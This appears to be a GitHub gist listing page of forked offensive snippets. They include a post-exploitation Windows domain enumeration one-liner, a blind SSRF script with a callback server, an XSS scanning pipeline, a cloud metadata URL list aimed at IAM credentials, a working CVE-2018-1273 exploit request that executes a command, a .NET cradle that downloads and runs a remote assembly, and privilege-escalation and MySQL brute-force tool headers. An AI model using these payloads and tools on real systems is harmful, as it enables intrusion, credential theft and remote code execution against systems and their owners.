Skip to content

Instantly share code, notes, and snippets.

@xstpl
xstpl / DomainEnumeration.bat
Created January 18, 2021 19:55 — forked from KyleHanslovan/DomainEnumeration.bat
Post-exploitation host/domain survey using native Windows commands.
whoami & hostname & ipconfig /all & net user /domain 2>&1 & net group /domain 2>&1 & net group "domain admins" /domain 2>&1 & net group "Exchange Trusted Subsystem" /domain 2>&1 & net accounts /domain 2>&1 & net user 2>&1 & net localgroup administrators 2>&1 & netstat -an 2>&1 & tasklist 2>&1 & sc query 2>&1 & systeminfo 2>&1 & reg query "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" 2>&1
@xstpl
xstpl / ssrf.sh
Created May 12, 2020 13:16 — forked from hussein98d/ssrf.sh
This script takes a domain name and a callback server, parses links , appends SSRF parameters and fire the requests.
echo "Blind SSRF testing - append to parameters and add new parameters @hussein98d"
echo "Usage: bash script.sh domain.com http://server-callbak"
echo "This script uses https://github.com/ffuf/ffuf, https://github.com/lc/gau, https://github.com/tomnomnom/waybackurls"
if [ -z "$1" ]; then
echo >&2 "ERROR: Domain not set"
exit 2
fi
if [ -z "$2" ]; then
echo >&2 "ERROR: Sever link not set"
exit 2
@xstpl
xstpl / xss_one_liner.md
Created May 12, 2020 13:14 — forked from cihanmehmet/xss_one_liner.md
xss_one_liner.md
#cat targets_urls.txt                
http://public-firing-range.appspot.com

Command Line

gospider -S targets_urls.txt -c 10 -d 5 --blacklist ".(jpg|jpeg|gif|css|tif|tiff|png|ttf|woff|woff2|ico|pdf|svg|txt)" --other-source | grep -e "code-200" | awk '{print $5}'| grep "=" | qsreplace -a | dalfox pipe -o result.txt
@xstpl
xstpl / sslsub.sh
Created May 12, 2020 13:08 — forked from gwen001/sslsub.sh
get altnames from ssl certificates
function sslsub() {
timeout 3 openssl s_client -showcerts -servername $1 -connect $1:443 <<< "Q" 2>/dev/null | openssl x509 -text -noout | grep DNS | tr ',' '\n' | cut -d ':' -f 2 | sort -fu
}
@xstpl
xstpl / cloud_metadata.txt
Created July 14, 2019 20:07 — forked from jhaddix/cloud_metadata.txt
Cloud Metadata Dictionary useful for SSRF Testing
## AWS
# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories
http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/ami-id
http://169.254.169.254/latest/meta-data/reservation-id
http://169.254.169.254/latest/meta-data/hostname
http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key
@xstpl
xstpl / get_dns_records.py
Created January 15, 2019 14:46 — forked from f0r34chb3t4/get_dns_records.py
Printing all DNS records using DNSPython in Python 3
#!/usr/bin/env python
# -*- coding utf-8 -*-
#
# Copyright 2016 Akshay Raj Gollahalli
import dns.resolver
def get_records(domain):
"""
@xstpl
xstpl / CVE-2018-1273.http
Created August 7, 2018 00:47 — forked from matthiaskaiser/CVE-2018-1273.http
POC for CVE-2018-1273
POST /users HTTP/1.1
Host: localhost:8080
Content-Type: application/x-www-form-urlencoded
Content-Length: 164
username[#this.getClass().forName("javax.script.ScriptEngineManager").newInstance().getEngineByName("js").eval("java.lang.Runtime.getRuntime().exec('xterm')")]=asdf
@xstpl
xstpl / linuxprivchecker.py
Created August 6, 2018 18:07 — forked from sh1n0b1/linuxprivchecker.py
linuxprivchecker.py -- a Linux Privilege Escalation Check Script
#!/usr/env python
###############################################################################################################
## [Title]: linuxprivchecker.py -- a Linux Privilege Escalation Check Script
## [Author]: Mike Czumak (T_v3rn1x) -- @SecuritySift
##-------------------------------------------------------------------------------------------------------------
## [Details]:
## This script is intended to be executed locally on a Linux box to enumerate basic system info and
## search for common privilege escalation vectors such as world writable files, misconfigurations, clear-text
## passwords and applicable exploits.
@xstpl
xstpl / DotnetAssemblyDownloadCradle.cs
Created July 21, 2018 12:00 — forked from cobbr/DotnetAssemblyDownloadCradle.cs
A download cradle for .NET assemblies.
public class Program { public static void Main(string[] args) { System.Reflection.Assembly.Load(new System.Net.WebClient().DownloadData(args[0])).GetTypes()[0].GetMethods()[0].Invoke(0, null); } }
@xstpl
xstpl / mysql_brute.rb
Created January 11, 2017 22:09 — forked from postmodern/mysql_brute.rb
MySQL Bruteforcer

Configuration

  • mysql: 14.14 Distrib 5.5.14
  • host: 127.0.0.1
  • port: 3306
  • user: victim
  • password: 56789

Install